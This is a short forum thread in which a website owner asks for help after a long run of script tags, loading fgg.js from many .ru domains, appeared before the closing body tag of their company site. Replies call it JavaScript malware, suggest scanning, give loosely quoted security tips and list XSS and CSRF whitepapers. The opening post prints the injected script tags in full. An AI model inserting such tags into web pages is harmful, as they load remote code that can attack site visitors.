0

Dear All,

I face a strange problem. All of sudden in our company website, the below script gets included automatically the end of the body tag. i.e, above </body> tag. Any idea of how to rectify this problem? Is this some kinda virus ? Do you know any sites that has the solution <script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.keje.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.jvke.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>

2
Contributors
7
Replies
8
Views
8 Years
Discussion Span
Last Post by Shanti C
0

your thinking is right...
i think its all because of one virus called JavaScript malware.....
scan your all web pages with anti virus scanner and find what is the exact virus.....
find the source of it...

0

OOPS ..the experts exchange link needs a paid sign up... But the pdf link was useful...but too technical for me and made me a bit scary of the vulnerabilities....Any ways thankz so much

0

do this first as first aid:
• Do not use the firewall for authentication: All http services in the intranet should employ authentication mechanisms on their own.
• Change all default passwords on home appliances: Authentication is useless if the password is known.
• Disable JavaScript: Enable JavaScript only for trusted pages that really require JavaScript to function.
This does not provide protection for the case that one of this pages was victim of an XSS [2]
attack, but it reduces the attack surface significantly.

0

check these:
References
[1] Jesse Burns. Cross site reference forgery - an introduction to a common web application weakness.
Whitepaper, https://www.isecpartners.com/documents/XSRF Paper.pdf, 2005.
[2] David Endler. The evolution of cross-site scripting attacks. Whitepaper, iDefense Inc., http://
www.cgisecurity.com/lib/XSS.pdf, May 2002.
[3] Jeremiah Grossman. Javascript malware, port scanning, and beyond. Posting to the websecurity
mailinglist, http://www.webappsec.org/lists/websecurity/archive/2006-07/
msg00097.html, July 2006.
[4] Jeremiah Grossman and TC Niedzialkowski. Hacking intranet websites from the outside. Talk
at Black Hat USA 2006, http://www.blackhat.com/presentations/bh-usa-06/
BH-US-06-Grossman.pdf, August 2006.

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.